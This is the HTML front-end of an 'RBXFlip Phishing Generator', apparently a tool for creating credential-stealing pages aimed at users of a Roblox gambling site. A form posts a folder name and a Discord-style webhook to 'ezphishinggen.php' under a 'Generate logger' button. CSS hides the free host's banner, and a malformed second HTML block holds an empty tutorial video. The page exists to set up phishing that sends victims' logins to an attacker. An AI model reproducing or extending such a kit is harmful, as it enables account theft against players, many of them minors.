<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <link rel="stylesheet" href="https://rbx-snipe.xyz/style.css">
        <link rel="apple-touch-icon" type="image/png" href="" />
        <meta name="apple-mobile-web-app-title" content="RBXFlip Phishing Generator" />
        <link rel="shortcut icon" type="image/png" href="" />
        <link rel="mask-icon" type="" href="" color="#111" />
        <title>RBXFlip Phishing Generator</title>
        <script src="https://kit.fontawesome.com/44580aece4.js" crossorigin="anonymous"></script>
        <style>
            /* https://gist.github.com/Richienb/92ed3443519f782cbc73143b190b238b#gistcomment-2978230 */
            img[alt*="000webhost"],
            img[alt*="000webhost"][style],
            img[src*="000webhost"],
            img[src*="000webhost"][style],
            body > div:nth-last-of-type(1)[style]{
                opacity: 0 !important;
                pointer-events:none !important;
                width: 0px !important;
                height: 0px !important;
                visibility:hidden !important;
                display:none !important;
            }
            /* https://codepen.io/elujambio/pen/YLMVed */
            * {
                font-family: -apple-system, BlinkMacSystemFont, "San Francisco", Helvetica, Arial, sans-serif;
                font-weight: 300;
                margin: 0;
            }

            html,
            body {
                height: 100vh;
                width: 100vw;
                margin: 0 0;
                display: flex;
                align-items: flex-start;
                justify-content: flex-start;
                background: #f3f2f2;
            }

            h4 {
                font-size: 24px;
                font-weight: 600;
                color: #000;
                opacity: 0.85;
            }
            h44 {                
                width: 750px;
                font-size: 23px;
                font-weight: 550;
                color: #000000;
                opacity: 0.85;
            }
            h444 {
                width: 600px;
                font-size: 24px;
                font-weight: 600;
                color: #000000;
                opacity: 0.85;
            }
            label {
                font-size: 12.5px;
                color: #000;
                opacity: 0.8;
                font-weight: 400;
            }

            form {
                padding: 40px 30px;
                background: #fefefe;
                display: flex;
                flex-direction: column;
                align-items: flex-start;
                padding-bottom: 20px;
                width: 300px;
            }
            form h4 {
                margin-bottom: 20px;
                color: rgba(0, 0, 0, 0.5);
            }
            form h4 span {
                color: black;
                font-weight: 700;
            }
            form p {
                line-height: 155%;
                margin-bottom: 5px;
                font-size: 14px;
                color: #000;
                opacity: 0.65;
                font-weight: 400;
                max-width: 200px;
                margin-bottom: 40px;
            }
            a.discrete {
                color: rgba(0, 0, 0, 0.4);
                font-size: 14px;
                border-bottom: solid 1px rgba(0, 0, 0, 0);
                padding-bottom: 4px;
                margin-left: auto;
                font-weight: 300;
                transition: all 0.3s ease;
                margin-top: 40px;
            }
            a.discrete:hover {
                border-bottom: solid 1px rgba(0, 0, 0, 0.2);
            }

            button {
                -webkit-appearance: none;
                width: auto;
                min-width: 100px;
                border-radius: 24px;
                text-align: center;
                padding: 15px 40px;
                margin-top: 5px;
                background-color: #46CC99;
                color: #fff;
                font-size: 14px;
                margin-left: auto;
                font-weight: 500;
                box-shadow: 0px 2px 6px -1px rgba(0, 0, 0, 0.13);
                border: none;
                transition: all 0.3s ease;
                outline: 0;
            }
            button:hover {
                transform: translateY(-3px);
                box-shadow: 0 2px 6px -1px rgba(182, 157, 230, 0.65);
            }
            button:hover:active {
                transform: scale(0.99);
            }

            input {
                font-size: 16px;
                padding: 20px 0px;
                height: 56px;
                border: none;
                border-bottom: solid 1px rgba(0, 0, 0, 0.1);
                background: #fff;
                width: 280px;
                box-sizing: border-box;
                transition: all 0.3s linear;
                color: #000;
                font-weight: 400;
                -webkit-appearance: none;
            }
            input:focus {
                border-bottom: solid 1px #b69de6;
                outline: 0;
                box-shadow: 0 2px 6px -8px rgba(182, 157, 230, 0.45);
            }

            .floating-label {
                position: relative;
                margin-bottom: 10px;
                width: 100%;
            }
            .floating-label label {
                position: absolute;
                top: calc(50% - 7px);
                left: 0;
                opacity: 0;
                transition: all 0.3s ease;
                padding-left: 44px;
            }
            .floating-label input {
                width: calc(100% - 44px);
                margin-left: auto;
                display: flex;
            }
            .floating-label .icon {
                position: absolute;
                top: 0;
                left: 0;
                height: 56px;
                width: 44px;
                display: flex;
            }
            .floating-label .icon svg {
                height: 30px;
                width: 30px;
                margin: auto;
                opacity: 0.15;
                transition: all 0.3s ease;
            }
            .floating-label .icon svg path {
                transition: all 0.3s ease;
            }
            .floating-label input:not(:-moz-placeholder-shown) {
                padding: 28px 0px 12px 0px;
            }
            .floating-label input:not(:-ms-input-placeholder) {
                padding: 28px 0px 12px 0px;
            }
            .floating-label input:not(:placeholder-shown) {
                padding: 28px 0px 12px 0px;
            }
            .floating-label input:not(:-moz-placeholder-shown) + label {
                transform: translateY(-10px);
                opacity: 0.7;
            }
            .floating-label input:not(:-ms-input-placeholder) + label {
                transform: translateY(-10px);
                opacity: 0.7;
            }
            .floating-label input:not(:placeholder-shown) + label {
                transform: translateY(-10px);
                opacity: 0.7;
            }
            .floating-label input:valid:not(:-moz-placeholder-shown) + label + .icon svg {
                opacity: 1;
            }
            .floating-label input:valid:not(:-ms-input-placeholder) + label + .icon svg {
                opacity: 1;
            }
            .floating-label input:valid:not(:placeholder-shown) + label + .icon svg {
                opacity: 1;
            }
            .floating-label input:valid:not(:-moz-placeholder-shown) + label + .icon svg path {
                fill: #b69de6;
            }
            .floating-label input:valid:not(:-ms-input-placeholder) + label + .icon svg path {
                fill: #b69de6;
            }
            .floating-label input:valid:not(:placeholder-shown) + label + .icon svg path {
                fill: #b69de6;
            }
            .floating-label input:not(:valid):not(:focus) + label + .icon {
                -webkit-animation-name: shake-shake;
                animation-name: shake-shake;
                -webkit-animation-duration: 0.3s;
                animation-duration: 0.3s;
            }

            @-webkit-keyframes shake-shake {
                0% {
                    transform: translateX(-3px);
                }
                20% {
                    transform: translateX(3px);
                }
                40% {
                    transform: translateX(-3px);
                }
                60% {
                    transform: translateX(3px);
                }
                80% {
                    transform: translateX(-3px);
                }
                100% {
                    transform: translateX(0px);
                }
            }

            @keyframes shake-shake {
                0% {
                    transform: translateX(-3px);
                }
                20% {
                    transform: translateX(3px);
                }
                40% {
                    transform: translateX(-3px);
                }
                60% {
                    transform: translateX(3px);
                }
                80% {
                    transform: translateX(-3px);
                }
                100% {
                    transform: translateX(0px);
                }
            }
            .session {
                display: flex;
                flex-direction: row;
                width: auto;
                height: auto;
                margin: auto auto;
                background: #ffffff;
                border-radius: 4px;
                box-shadow: 0px 2px 6px -1px rgba(0, 0, 0, 0.12);
            }

            .left {
                width: 220px;
                height: auto;
                min-height: 100%;
                position: relative;
                background-image: url("https://i.ibb.co/x6tCgwv/moon.jpg?auto=compress&cs=tinysrgb&dpr=2&h=650&w=940");
                background-size: cover;
                border-top-left-radius: 4px;
                border-bottom-left-radius: 4px;
            }
            .bottom {
                width: auto;
                height: auto;
                min-height: 100%;
                position: relative;
                border-top-left-radius: 4px;
                border-bottom-left-radius: 8px;
            }
            .left svg {
                height: 40px;
                width: auto;
                margin: 20px;
            }
            .session2 {
                display: flex;
                flex-direction: bottom;
                width: 550;
                height: auto;
                margin: auto auto;
                background: #ffffff;
                border-radius: 4px;
                box-shadow: 0px 2px 6px -1px rgba(0, 0, 0, 0.12);
            }
}
        </style>
    </head>
    <body translate="no">
        <div class="session">
            <div class="left">
                <!--?xml version="1.0" encoding="UTF-8"?-->
                <svg enable-background="new 0 0 300 302.5" version="1.1" viewBox="0 0 300 302.5" xml:space="preserve" xmlns="http://www.w3.org/2000/svg">
                    <style type="text/css">
                        .st01 {
                            fill: #fff;
                        }
                    </style>
                    <path
                        class="st01"
                        d=""
                    ></path>
                </svg>
            </div>
            <form method="POST" action="ezphishinggen.php" autocomplete="off">
                <h4>RBXFlip Phishing Generator<span></span></h4>
                <div class="floating-label">
                    <input placeholder="Folder" type="text" name="folder" id="folder" autocomplete="off">
                    <label for="folder">Folder:</label>
                    <div class="icon">
                        <i class="fas fa-folder fa-2x"></i>
                    </div>
                </div>
                <div class="floating-label">
                    <input placeholder="Webhook" type="text" name="webhook" id="webhook" autocomplete="off">
                    <label for="webhook">Webhook:</label>
                    <div class="icon">
                    	<i class="fas fa-fish fa-2x"></i>
                    </div>
                </div>
                <button type="submit">Generate logger</button>
            </form>
</body>
<html>
    <body translate="no">
        <div class="session2">
            <div class="bottom">
                <!--?xml version="1.0" encoding="UTF-8"?-->
                    <style type="text/css">
                        .st01 {
                        }
                    </style>
                    <path
                        class="st01"
                        d=""
                    ></path>
                </svg>
            </div>
            <form
            <head></head>
         <h44>RBXFlip Phishing Generator Tutorial</h44>
         <title>Video</title>
     </head>

     <body>

          <video width="515" controls>
              <source src="" type="video/mp4">
          </video>

     </body>       
        <h444></h444> 
            </form>
</html>